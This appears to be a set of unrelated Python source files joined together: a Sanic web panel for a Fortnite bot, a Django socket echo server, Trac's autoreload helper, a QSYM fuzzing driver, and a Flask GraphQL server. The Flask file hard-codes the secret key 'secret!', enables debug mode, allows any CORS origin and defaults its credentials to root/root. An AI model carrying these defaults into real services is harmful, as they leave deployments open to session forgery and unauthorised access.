json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
else:
@app.route("/", methods=["GET", "POST"])
async def main(request: Request):
if request.method == "GET":
return render_template(
"main.html",
l=l,
authenticated=auth.authenticated(request),
data=data
)
elif request.method == "POST":
if auth.authenticated(request):
Thread(target=restart,args=(1,)).start()
return sanic.response.redirect("/")
@app.route("/login", methods=["GET", "POST"])
async def login(request: Request):
if auth.authenticated(request):
return sanic.response.redirect("/")
else:
flash_messages = []
if request.method == "GET":
return render_template("login.html", l=l, flash_messages=flash_messages)
elif request.method == "POST":
if request.form.get("password","") == data["web"]["password"]:
r = sanic.response.redirect("/")
auth.login_user(request, r)
return r
else:
flash_messages.append(l('invalid_password'))
return render_template("login.html", l=l, flash_messages=flash_messages)
@app.route("/text")
@auth.login_required
async def web_text_(request: Request):
return sanic.response.json(
{
"text": web_text
}
)
@app.route("/logout")
@auth.login_required
async def logout(request: Request):
r = sanic.response.redirect("/")
auth.logout_user(request, r)
return r
@app.route("/config_editor", methods=["GET", "POST"])
@auth.login_required
async def config_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("config.json")
return render_template(
"config_editor.html",
l=l,
data=data,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
flag = False
raw = request.form
data = load_json("config.json")
corrected = data
for key_,tags in config_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key] = re.split(r'\r\n|\n',value) if value else []
elif int in tags:
corrected[key] = [int(i) for i in re.split(r'\r\n|\n',value)] if value else []
elif str in tags:
corrected[key] = value.replace(r"\\n",r"\n").replace(r"\n","\n") if value else ""
elif int in tags:
corrected[key] = int(value) if value else 0
elif bool_ in tags:
corrected[key] = bool_.create(value)
elif bool_none in tags:
corrected[key] = bool_none.create(value)
elif nest == 2:
key2 = keys[1]
if dict in tags:
if not corrected.get(key):
corrected[key] = {}
if not corrected[key].get(key2):
corrected[key][key2] = {}
else:
value2 = raw.get(f"['{key}']['{key2}']")
if FixRequired in tags and value2 == corrected.get(key,{}).get(key2):
flash_messages_red.append(l('this_field_fix_required', f"{key}: {key2}"))
flag = True
if CanBeMultiple in tags:
if str in tags:
corrected[key][key2] = re.split(r'\r\n|\n',value2) if value2 else []
elif int in tags:
corrected[key][key2] = [int(i) for i in re.split(r'\r\n|\n',value2)] if value2 else []
elif str in tags:
corrected[key][key2] = value2.replace(r"\\n",r"\n").replace(r"\n","\n") if value2 else ""
elif int in tags:
corrected[key][key2] = int(value2) if value2 else 0
elif bool_ in tags:
corrected[key][key2] = bool_.create(value2)
elif bool_none in tags:
corrected[key][key2] = bool_none.create(value2)
if flag:
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
corrected["status"] = 1
with open('config.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"config_editor.html",
l=l,
data=corrected,
config_tags=config_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
can_linebreak=CanLinebreak,
select=select,
str=str,
int=int,
bool=bool,
list=list,
map=map,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/commands_editor", methods=["GET", "POST"])
@auth.login_required
async def commands_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("commands.json")
return render_template(
"commands_editor.html",
l=l,
data=data,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
elif request.method == "POST":
flag = False
raw = request.form
data = load_json("commands.json")
corrected = data
for key_,tags in commands_tags.items():
keys = key_.replace("'","").replace("[","").split("]")
key = keys[0]
nest = len(keys) - 1
if nest == 1:
if dict in tags:
if not corrected[key]:
corrected[key] = {}
else:
value = raw.get(f"['{key}']")
if FixRequired in tags and value == corrected.get(key):
flash_messages_red.append(l('this_field_fix_required', key))
flag = True
corrected[key] = re.split(r'\r\n|\n',value) if value else []
if flag:
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
join=str.join,
split=str.split,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
else:
with open('commands.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"commands_editor.html",
l=l,
data=corrected,
commands_tags=commands_tags,
len=len,
type=type,
can_be_multiple=CanBeMultiple,
select=select,
str=str,
int=int,
bool=bool,
list=list,
red=Red,
fix_required=FixRequired,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red
)
@app.route("/replies_editor", methods=["GET", "POST"])
@auth.login_required
async def replies_editor(request: Request):
flash_messages = []
flash_messages_red = []
if request.method == "GET":
data = load_json("replies.json")
return render_template(
"replies_editor.html",
l=l,
data=data,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
elif request.method == "POST":
raw = request.form
corrected = {}
for num in range(0,int(raw["number"][0])):
trigger = raw.get(f"trigger{str(num)}")
if not trigger:
flash_messages_red.append(l('cannot_be_empty'))
break
content = raw.get(f"content{str(num)}")
if not content:
flash_messages_red.append(l('cannot_be_empty'))
break
corrected[trigger] = content
with open('replies.json', 'w', encoding='utf-8') as f:
json.dump(corrected, f, ensure_ascii=False, indent=4, sort_keys=False)
if raw.get("reload"):
Thread(target=restart, args=(1,)).start()
return sanic.response.redirect("/")
else:
flash_messages.append(l('web_saved'))
return render_template(
"replies_editor.html",
l=l,
data=corrected,
flash_messages=flash_messages,
flash_messages_red=flash_messages_red,
len=len,
enumerate=enumerate,
str=str
)
@app.route("/party_viewer", methods=["GET"])
@auth.login_required
async def party_viewer(request: Request):
return render_template(
"party_viewer.html",
l=l,
clients=clients,
enumerate=enumerate
)
@app.route("/clients<num>", methods=["GET", "POST"])
@auth.login_required
async def clients_viewer(request: Request, num: str):
num = int(num)
client = clients[num] if clients[num:num+1] else None
if not client:
sanic.exceptions.abort(404)
flash_messages = []
if request.method == "GET":
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
if request.form.get("command"):
content = request.form["command"][0] if isinstance(request.form["command"],list) else request.form["command"]
message = WebMessage(content, request.cookies.get(auth.cookie_key, 'NoID'), client)
await process_command(message)
result = message.result
if result:
for mes in message.result:
for m in mes.split('\n'):
flash_messages.append(m)
return render_template(
"clients_viewer.html",
l=l,
client=client,
none=None,
len=len,
flash_messages=flash_messages
)
else:
return sanic.response.redirect(f"/clients{num}")
@app.route("/clients_info/<num>", methods=["GET"])
@auth.login_required
async def clients_info(request: Request, num: str):
num = int(num)
client = clients[num] if len(clients[num:num+1]) == 1 else None
if not client:
return sanic.response.json(
{
"error": "account_not_exists"
}
)
elif not client.isready:
return sanic.response.json(
{
"error": "account_not_loaded"
}
)
elif not client.party or not client.party.me:
return sanic.response.json(
{
"error": "party_moving"
}
)
else:
return sanic.response.json(
{
"display_name": client.user.display_name,
"id": client.user.id,
"leader": client.party.me.leader,
"banner": search_banner(client.party.me.banner[0]),
"level": client.party.me.banner[2],
"outfit": member_asset(client.party.me, "outfit"),
"outfit_variants": client.party.me.outfit_variants,
"backpack": member_asset(client.party.me, "backpack"),
"backpack_variants": client.party.me.backpack_variants,
"pickaxe": member_asset(client.party.me, "pickaxe"),
"pickaxe_variants": client.party.me.pickaxe_variants,
"contrail": member_asset(client.party.me, "contrail"),
"emote": member_asset(client.party.me, "emote"),
"party_id": client.party.id,
"members": [
{
"display_name": i.display_name,
"id": i.id,
"leader": i.leader,
"banner": search_banner(i.banner[0]),
"level": i.banner[2],
"outfit": member_asset(i, "outfit"),
"outfit_variants": i.outfit_variants,
"backpack": member_asset(i, "backpack"),
"backpack_variants": i.backpack_variants,
"pickaxe": member_asset(i, "pickaxe"),
"pickaxe_variants": i.pickaxe_variants,
"contrail": member_asset(i, "contrail"),
"emote": member_asset(i, "emote")
} for i in client.party.members
]
}
)
@app.route("/boot_switch", methods=["GET", "POST"])
@auth.login_required
async def boot_switch(request: Request):
if request.method == "GET":
return render_template(
"boot_switch.html",
l=l,
len=len
)
elif request.method == "POST":
raw = request.form
for i in raw.keys():
if "on" in i or "off" in i:
break
on_or_off = i
num = int(re.sub(r"on|off","", on_or_off))
on_or_off = i.replace(str(num),"")
loop = asyncio.get_event_loop()
if on_or_off == "on":
clients[num].booting = True
loop.create_task(clients[num].start())
elif on_or_off == "off":
loop.create_task(clients[num].close())
return sanic.response.redirect("/boot_switch")
@app.route("/boot_info", methods=["GET"])
@auth.login_required
async def boot_info(request: Request):
data = {}
for client in clients:
if not client.booting and not client.isready:
data[client.email] = {
"info": "info_closed",
"booting": client.booting,
"isready": client.isready
}
elif client.booting:
data[client.email] = {
"info": "info_booting",
"booting": client.booting,
"isready": client.isready
}
elif client.isready:
data[client.email] = {
"info": "info_ready",
"booting": client.booting,
"isready": client.isready
}
return sanic.response.json(data)
@app.exception(sanic.exceptions.NotFound)
async def not_found(request: Request, exception: Exception):
return render_template("not_found.html", l=l)
@auth.no_auth_handler
async def unauthorized(request: Request, *args, **kwargs):
return sanic.response.redirect("/")
loop = asyncio.get_event_loop()
if data.get('web',{}).get('enabled',True) is True or data.get('status',1) == 0:
loop.create_task(run_app())
Thread(target=dprint,args=(),daemon=True).start()
Thread(target=store_banner_data).start()
if data.get("status",1) != 0:
try:
langs = [
data["search-lang"],
data["sub-search-lang"]
] if data["sub-search-lang"] and data["sub-search-lang"] != data["search-lang"] else [
data["search-lang"]
]
store_item_data(langs)
except Exception:
send(l('bot'),l('api_downing'),red)
items = {}
styles = {}
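# Resolve the configured cosmetic names/IDs once at startup: try every
# (language, name/id) combination per item type and keep the first hit.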
with ThreadPoolExecutor() as executor:
items_futures = {executor.submit(search_item,lang,mode,data['fortnite'][type_.split(',')[0]],",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for lang in langs for mode in ("name","id") for type_ in ("outfit","backpack,pet","pickaxe","emote,emoji,toy")}
for future,type_ in items_futures.items():
result = future.result()
if result and not items.get(type_):
items[type_] = result[0]
with ThreadPoolExecutor() as executor:
styles_futures = {executor.submit(search_style,data["search-lang"],items.get(type_.split(',')[0],{}).get("id"),",".join(convert_to_new_type(i) for i in type_.split(','))): type_.split(',')[0] for type_ in ("outfit","backpack,pet","pickaxe") if data["fortnite"][f"{type_.split(',')[0]}_style"]}
for future,type_ in styles_futures.items():
result = future.result()
if result and not styles.get(type_):
variants = [i["variants"] for i in result if data["fortnite"][f"{type_}_style"] in i["name"]]
if variants:
styles[type_] = variants[0]
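# Build one fortnitepy client per configured account, reusing a stored
# device auth when available and generating (and persisting) one otherwise.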
for email in data["fortnite"]["email"]:
email = email.strip()
try:
device_auth_details = get_device_auth_details().get(email.lower(), {})
if not device_auth_details:
device_auth_details = loop.run_until_complete(generate_device_auth_and_store(email))
client = Client(
auth=fortnitepy.DeviceAuth(
**device_auth_details
),
default_party_config=fortnitepy.DefaultPartyConfig(
privacy=data['fortnite']['privacy']
),
default_party_member_config=fortnitepy.DefaultPartyMemberConfig(
meta=[
partial(ClientPartyMember.set_outfit, items.get("outfit",{}).get("id",data["fortnite"]["outfit"]), variants=styles.get("outfit")),
partial(ClientPartyMember.set_backpack, items.get("backpack",{}).get("id",data["fortnite"]["backpack"]), variants=styles.get("backpack")),
partial(ClientPartyMember.set_pickaxe, items.get("pickaxe",{}).get("id",data["fortnite"]["pickaxe"]), variants=styles.get("pickaxe")),
partial(ClientPartyMember.set_battlepass_info, has_purchased=True, level=data['fortnite']['tier'], self_boost_xp=data['fortnite']['xpboost'], friend_boost_xp=data['fortnite']['friendxpboost']),
partial(ClientPartyMember.set_banner, icon=data['fortnite']['banner'], color=data['fortnite']['banner_color'], season_level=data['fortnite']['level'])
]
),
platform=fortnitepy.Platform(data['fortnite']['platform'].upper()),
emote=items.get("emote",{}).get("id",data["fortnite"]["emote"])
)
except ValueError:
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(l("bot"),l('error_while_setting_client'),red,add_d=lambda x:f'>>> {x}')
continue
clients.append(client)
if data.get('status',1) != 0 and bot_ready:
loop.create_task(run_bot())
try:
loop.run_forever()
except KeyboardInterrupt:
sys.exit(1)
|
runteststorage.py
|
from __future__ import unicode_literals
import socket
import multiprocessing
from django.core.management.base import BaseCommand, CommandError
import logging
logger = logging.getLogger(__name__)
class Socket:
'''demonstration class only
- coded for clarity, not efficiency
'''
close_bit = "\x00"
processor = None
connection = None
context = None
address = None
chunk_size = 2048
def __init__(self, connection, address):
self.connection = connection
self.address = address
logger.info("Connected %r at %r", self.connection, self.address)
def run(self):
try:
message = ""
while True:
data = self.connection.recv(self.chunk_size).decode('utf-8')
if data == "":
logger.warning("Socket closed remotely")
break
message += data
if self.close_bit in message:
pos = message.index(self.close_bit)
partial_message = message[0:pos]
message = message[pos+len(self.close_bit):]
logger.debug("Received data %r", partial_message)
self.send(partial_message)
#context.add(data)
except Exception as e:
logger.critical("Problem handling request: %s" % e)
finally:
logger.critical("Closing socket")
self.connection.close()
def send(self, response):
message = response
if not message.endswith(self.close_bit):
message += self.close_bit
logger.debug("Sending: %s", message)
total_sent = 0
while total_sent < len(message):
sent = self.connection.send(message[total_sent:].encode('utf-8'))
if sent == 0:
raise RuntimeError("socket connection broken")
total_sent = total_sent + sent
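# Hedged client sketch (illustrative, not part of this module): the server
# echoes every null-terminated frame back to the sender, e.g.
#   import socket
#   s = socket.create_connection(("127.0.0.1", 7720))
#   s.sendall(b"hello\x00")
#   print(s.recv(2048))  # b"hello\x00"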
def handle_client(connection, address):
handler = Socket(connection, address)  # avoid shadowing the socket module
handler.run()
class Command(BaseCommand):
args = '<object object ...>'
#help = 'Help text goes here'
def handle(self, *args, **options):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('127.0.0.1', 7720))
sock.listen(1)
while True:
conn, address = sock.accept()
logger.info("Got connection")
process = multiprocessing.Process(target=handle_client, args=(conn, address))
process.daemon = True
process.start()
logger.info("Started process %r", process)
|
autoreload.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2018 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
import os
import sys
import threading
import time
import traceback
_SLEEP_TIME = 1
def _reloader_thread(modification_callback, loop_callback):
"""When this function is run from the main thread, it will force other
threads to exit when any modules currently loaded change.
:param modification_callback: a function taking a single argument,
the modified file, which is called
every time a modification is
detected
:param loop_callback: a function taking no arguments, which is
called after every modification check
"""
mtimes = {}
while True:
for filename in filter(None, [getattr(module, '__file__', None)
for module in sys.modules.values()]):
while not os.path.isfile(filename): # Probably in an egg or zip file
filename = os.path.dirname(filename)
if not filename:
break
if not filename: # Couldn't map to physical file, so just ignore
continue
if filename.endswith(('.pyc', '.pyo')):
filename = filename[:-1]
if not os.path.isfile(filename):
# Compiled file for non-existent source
continue
mtime = os.stat(filename).st_mtime
if filename not in mtimes:
mtimes[filename] = mtime
continue
if mtime != mtimes[filename]:
modification_callback(filename)
sys.exit(3)
loop_callback()
time.sleep(_SLEEP_TIME)
def _restart_with_reloader():
is_win32 = sys.platform == 'win32'
if is_win32:
can_exec = lambda path: os.path.isfile(path) and \
os.path.normpath(path).endswith('.exe')
else:
can_exec = lambda path: os.access(path, os.X_OK)
if os.path.isfile(sys.argv[0]):
args = sys.argv if can_exec(sys.argv[0]) else \
[sys.executable] + sys.argv
elif is_win32 and can_exec(sys.argv[0] + '.exe'):
args = [sys.argv[0] + '.exe'] + sys.argv[1:]
elif os.path.isfile(sys.argv[0] + '-script.py'):
args = [sys.executable, sys.argv[0] + '-script.py'] + sys.argv[1:]
else:
args = [sys.executable] + sys.argv
path = args[0]
if is_win32:
args = ['"%s"' % arg for arg in args]
new_environ = os.environ.copy()
new_environ['RUN_MAIN'] = 'true'
while True:
# This call reinvokes ourself and goes into the other branch of main as
# a new process.
exit_code = os.spawnve(os.P_WAIT, path, args, new_environ)
if exit_code != 3:
return exit_code
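# Hedged usage sketch (run/on_change are illustrative names):
#   def run():
#       ...  # long-running entry point
#   def on_change(path):
#       print('%s changed, restarting' % path)
#   main(run, on_change)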
def main(func, modification_callback, *args, **kwargs):
"""Run the given function and restart any time modules are changed."""
if os.environ.get('RUN_MAIN'):
exit_code = []
def main_thread():
try:
func(*args, **kwargs)
exit_code.append(None)
except SystemExit as e:
exit_code.append(e.code)
except:
traceback.print_exception(*sys.exc_info())
exit_code.append(1)
def check_exit():
if exit_code:
sys.exit(exit_code[0])
# Launch the actual program as a child thread
thread = threading.Thread(target=main_thread, name='Main thread')
thread.daemon = True
thread.start()
try:
# Now wait for a file modification and quit
_reloader_thread(modification_callback, check_exit)
except KeyboardInterrupt:
pass
else:
# Initial invocation just waits around restarting this executable
try:
sys.exit(_restart_with_reloader())
except KeyboardInterrupt:
pass
|
qsym.py
|
import ConfigParser
import multiprocessing
import subprocess
import os
import sys
import utils
import shutil
import signal
import tempfile
from utils import bcolors
from utils import mkdir, mkdir_force
import qsym_minimizer as minimizer
from qsym_executor import Executor
DEFAULT_TIMEOUT = 90
TARGET_FILE = utils.AT_FILE
def se_info(s):
print bcolors.HEADER+"[QSYM-Info]"+bcolors.ENDC," {0}".format(s)
def get_afl_cmd(fuzzer_stats):
with open(fuzzer_stats) as f:
for l in f:
if l.startswith("command_line"):
# format= "command_line: [cmd]"
return l.split(":")[1].strip().split()
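# e.g. (illustrative) a fuzzer_stats line such as
#   command_line: /afl/afl-fuzz -i in -o sync -- ./target @@
# yields ['/afl/afl-fuzz', '-i', 'in', '-o', 'sync', '--', './target', '@@']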
class Qsym:
def __repr__(self):
return "SE Engine: QSYM Concolic Explorer"
def __init__(self, config, target):
self.jobs = {}
self.started_jobs = set()
self.config = config
self.target = target
self.get_config()
self.pid_ctr = 0
self.minimizer = None
self.make_dirs()
def init_minimizer(self):
if self.minimizer is not None:
return
cmd, afl_path, qemu_mode = self.parse_afl_stats()
self.minimizer = minimizer.TestcaseMinimizer(
cmd, afl_path, self.seed_dir, qemu_mode)
def parse_afl_stats(self):
cmd = get_afl_cmd(os.path.join(self.afl_dir, "fuzzer_stats"))
assert cmd is not None
index = cmd.index("--")
return cmd[index+1:], os.path.dirname(cmd[0]), '-Q' in cmd
@property
def bitmap(self):
return os.path.join(self.seed_dir, "bitmap")
@property
def afl_dir(self):
return os.path.join(self.sync_dir, "slave_000001")
def my_in_dir(self, counter):
return os.path.join(self.seed_dir, counter)
def my_sync_dir(self, instance):
return os.path.join(self.sync_dir, instance, "queue")
def get_config(self):
config = ConfigParser.ConfigParser()
config.read(self.config)
self.name = config.get("qsym conc_explorer", "name")
self.cmd = config.get("qsym conc_explorer", "cmd").replace("@target", self.target).split(" ")
# store the selected inputs from fuzzer queue to be explored by qsym
self.seed_dir = config.get("qsym conc_explorer", "qsym_seed_dir").replace("@target", self.target)
self.sync_dir = config.get("moriarty", "sync_dir").replace("@target", self.target)
try:
self.max_time_per_seed = config.get("qsym conc_explorer", "max_time_per_seed")
except Exception:
self.max_time_per_seed = DEFAULT_TIMEOUT
try:
self.max_mem = config.get("klee conc_explorer", "max_memory")
except Exception:
self.max_mem = str(1024*1024*20) # in kbytes
def make_dirs(self):
mkdir_force(self.seed_dir)
def base_dir_from_afl_input(self, afl_input):
split = afl_input.split("/")
return str(os.path.join("/", *split[:-4]))
# cov_file is a dummy parameter
def run(self, input_id_map_list, cov_file):
"""
-create seed-out-dir
For each input,
-convert ktest and move it to seed-out-dir
-create sync dir
-build cmd
-create new process job
"""
pid = self.get_new_pid()
qsym_seed_dir = self.my_in_dir(str(pid))
mkdir_force(qsym_seed_dir)
se_info("{0} activated. input list : {1}".format(self, [x['input'] for x in input_id_map_list]))
se_info("{0} activated. input score : {1}".format(self, [x['score'] for x in input_id_map_list]))
se_info("{0} activated. input size: {1}".format(self, [x['size'] for x in input_id_map_list]))
# sync previously generated seeds
self.sync_gen_seeds() # Redundant if the QSYM explorer cycle always runs shorter than the main cycle
# launch qsym for each input in my_in_dir
for input_id_map in input_id_map_list:
#QSYM does not support batch mode
assert len(input_id_map_list) <= 1
# print input_id_map
afl_input = input_id_map['input']
qsym_seed = os.path.join(qsym_seed_dir, afl_input.split("/")[-1])
shutil.copy2(afl_input, qsym_seed)
if not os.path.exists(qsym_seed):
se_info("no seed created: " + qsym_seed)
continue
#--create sync_dir for new qsym instance
key = "qsym_instance_conc_" + str(pid).zfill(6)
new_sync_dir = self.my_sync_dir(key)
mkdir_force(new_sync_dir)
# temp dir to store temporarily generated seeds
# filtered seeds will be transferred to new_sync_dir
tmp_dir = tempfile.mkdtemp()
mkdir_force(tmp_dir)
#--build qsym instance cmd
q, qsym_cmd = self.build_cmd(qsym_seed, tmp_dir, self.bitmap)
print ' '.join(qsym_cmd)
# q.run(self.max_time_per_seed)
#--construct process meta data, add to jobs list
kw = {'stdin':q.stdin, 'mem_cap': self.max_mem, 'use_shell':True,
'testcase_dir':q.testcase_dir, 'target_base_path':self.base_dir_from_afl_input(afl_input)}
p = multiprocessing.Process(target=utils.qsym_exec_async, args=[qsym_cmd], kwargs=kw) # Needs docker implementation
p.daemon = True
task_st = {}
task_st['instance'] = p
task_st['sync_dir'] = new_sync_dir
task_st['cmd'] = qsym_cmd
task_st['tmp_dir'] = tmp_dir
task_st['qsym'] = q
task_st['seed_index'] = 0
task_st['synced'] = False
task_st['key'] = key
task_st['processed'] = False
self.jobs[pid] = task_st
for pid, task in self.jobs.iteritems():
try:
if pid not in self.started_jobs:
task['instance'].start()
task['real_pid'] = task['instance'].pid
self.started_jobs.add(pid)
except Exception:
pass
return (key, [x['input'] for x in input_id_map_list])
def build_cmd(self, cur_input, cur_output, bitmap):
q = Executor(self.cmd, cur_input, cur_output, bitmap=bitmap, argv=["-l", "1"])
cmd = q.gen_cmd(self.max_time_per_seed)
return q, cmd
def sync_gen_seeds(self):
self.init_minimizer()
# copy the generated inputs back
for pid, task in self.jobs.iteritems():
if task['synced']:
continue
print "syncing ", task['sync_dir']
print "syncing ", task['key']
task['synced'] = True
qsym = task['qsym']
target_dir = task['sync_dir']
index = task['seed_index']
# for testcase in qsym.get_testcases():
# filename = os.path.join(target_dir, "id:%06d:src:%s" % (index, 'qsym'))
# index += 1
# se_info("moving %s to %s" % (testcase, filename))
# shutil.move(testcase, filename)
num_testcase = 0
for testcase in qsym.get_testcases(task['sync_dir']):
# print testcase
if not self.minimizer.check_testcase(testcase):
# Remove if it's not interesting testcases
# os.unlink(testcase)
continue
target = os.path.basename(testcase)
filename = os.path.join(target_dir, "id:%06d:src:%s" % (index, task['key']+','+target))
index += 1
# se_info("moving %s to %s" % (testcase, filename))
shutil.move(testcase, filename)
se_info("Creating: %s" % filename)
# remove the tmp dir
shutil.rmtree(task['tmp_dir'])
def alive(self):
alive = False
# active_children() has the side effect of joining any child processes that have already finished
multiprocessing.active_children() # Maybe needs docker implementation?
for pid in [self.jobs[x]['real_pid'] for x in self.jobs]:
try:
os.kill(pid, 0)
print "conc_explorer pid: {0} is alive".format(pid)
alive = True
except Exception:
pass
# print "conc_explorer pid: {0} not alive".format(pid)
return alive
def stop(self):
"""
Terminate all jobs,
you could have more fine-grained control by extending this function
"""
se_info("{0} deactivated".format(self))
self.sync_gen_seeds() # syncs the seeds from /tmp/.../queuefolder to .../muse-djpeg-sync/qsym_instance_conc_000xxx
for pid, task in self.jobs.iteritems():
if task['processed']:
continue
task['processed'] = True
se_info("Terminting qsym instance: {0} {1} real pid:{2}".format(pid, task['instance'], task['real_pid']))
utils.terminate_proc_tree(task['real_pid']) # Maybe needs docker implementation?
self.jobs[pid]['processed'] = True
def get_new_pid(self):
self.pid_ctr += 1
return self.pid_ctr
def terminate_callback(self):
"""called when SIGINT and SIGTERM"""
pass
def periodic_callback(self):
"""called every 1 hour"""
pass
|
server.asyncio.py
|
#
# Copyright (c) 2020, 2021, John Grundback
# All rights reserved.
#
import sys
import os
import logging
logging.basicConfig(level=logging.INFO)
# logging.basicConfig(level=logging.DEBUG)
import simplejson as json
from flask import Flask
from flask_restful import Api
from flask_cors import CORS, cross_origin
from flask_swagger import swagger
from flask import request
from flask.views import View
from flask_graphql import GraphQLView
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from flask_socketio import SocketIO
from flask_socketio import send, emit
from flask_sockets import Sockets
from graphql_ws.gevent import GeventSubscriptionServer
import asyncio
import threading
import graphql
# from kafka import KafkaProducer
from aiokafka import AIOKafkaConsumer
from gfs.lib.config import GremlinFSConfig
from gfs.api.graphql.resource.schema import GFSGQLSchemas
from gfs.api.graphql.gql import GFSGQLView
app = Flask(__name__)
cors = CORS(app)
app.config["DEBUG"] = True
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['SECRET_KEY'] = 'secret!'
api = Api(app)
# socketio = SocketIO(app)
# socketio = SocketIO(app, logger=True, engineio_logger=True, debug=True)
socketio = SocketIO(app, cors_allowed_origins="*")
sockets = Sockets(app)
app.app_protocol = lambda environ_path_info: 'graphql-ws'
listen_addr = os.environ.get("LISTEN_ADDR", "0.0.0.0")
listen_port = os.environ.get("LISTEN_PORT", "5000")
# gfs_ns = os.environ.get("GFS_NAMESPACE", "gfs1")
gfs_host = os.environ.get("GFS_HOST", "gfsapi")
gfs_port = os.environ.get("GFS_PORT", "5000")
gfs_username = os.environ.get("GFS_USERNAME", "root")
gfs_password = os.environ.get("GFS_PASSWORD", "root")
kafka_host = os.environ.get("KAFKA_HOST", "kafka")
kafka_port = os.environ.get("KAFKA_PORT", "9092")
kafka_username = os.environ.get("KAFKA_USERNAME", None) # "kafka")
kafka_password = os.environ.get("KAFKA_PASSWORD", None) # "kafka")
if len(sys.argv) >= 3:
listen_addr = sys.argv[1]
listen_port = sys.argv[2]
elif len(sys.argv) >= 2:
listen_port = sys.argv[1]
config = GremlinFSConfig(
kafka_host = kafka_host,
kafka_port = kafka_port,
kafka_username = kafka_username,
kafka_password = kafka_password
)
kftopic1 = config.get("kf_topic1", "gfs1")
kftopic2 = config.get("kf_topic2", "gfs2")
kfgroup = config.get("kf_group", "ripple-group")
# @socketio.on('connect', namespace='/gfs1')
# def gfs1_connect():
# emit('message', {'data': 'Connected'})
# @socketio.on('disconnect', namespace='/gfs1')
# def gfs1_disconnect():
# pass
# @socketio.on('message', namespace='/gfs1')
# def handle_message(message):
# emit("message", "message response")
# @sockets.route('/subscriptions')
# def echo_socket(ws):
# subscription_server = GeventSubscriptionServer(
# # GFSGQLSchema(
# # "gfs1",
# # GFSGQLSchemas.instance()
# # ) # GFSGQLSchemas.instance().schema("gfs1")
# GFSGQLSchemas.instance().schema("gfs1")
# )
# subscription_server.handle(ws)
# return []
@sockets.route('/<namespace>/graphql/subscriptions')
def echo_socket2(ws, namespace):
subscription_server = GeventSubscriptionServer(
# GFSGQLSchema(
# namespace,
# GFSGQLSchemas.instance()
# ) # GFSGQLSchemas.instance().schema(namespace)
GFSGQLSchemas.instance().schema(namespace)
)
subscription_server.handle(ws)
return []
# schemas = GFSGQLSchemas()
# GFSGQLSchemas.instance(schemas)
# view_func = GFSGQLView.as_view(
# 'graphql',
# namespace='gfs1',
# schemas=GFSGQLSchemas.instance()
# )
# app.add_url_rule(
# '/<namespace>/graphql',
# view_func=view_func
# )
class GraphQLSchema(View):
def dispatch_request(self, namespace):
schemas = GFSGQLSchemas.instance()
return str( schemas.schema(namespace) )
view_func2 = GraphQLSchema.as_view(
'graphql2'
)
app.add_url_rule(
'/<namespace>/graphql/schema',
view_func=view_func2
)
#
# Quick and dirty schema rectifier
# TODO: Quick schema gen with no resolvers
# I use this for resolving field cardinality
#
def rewrite_node(node, schema, _type):
nnode = {}
for key in node:
val = node[key]
if _type and key in _type.fields:
if val and type(val) == dict:
typelabel = val.get("label")
if( isinstance(_type.fields[key].type, graphql.GraphQLList) ):
nnode[key] = [rewrite_node(node[key], schema, schema.get_type(typelabel))]
else:
nnode[key] = rewrite_node(node[key], schema, schema.get_type(typelabel))
else:
nnode[key] = val
else:
nnode[key] = val
return nnode
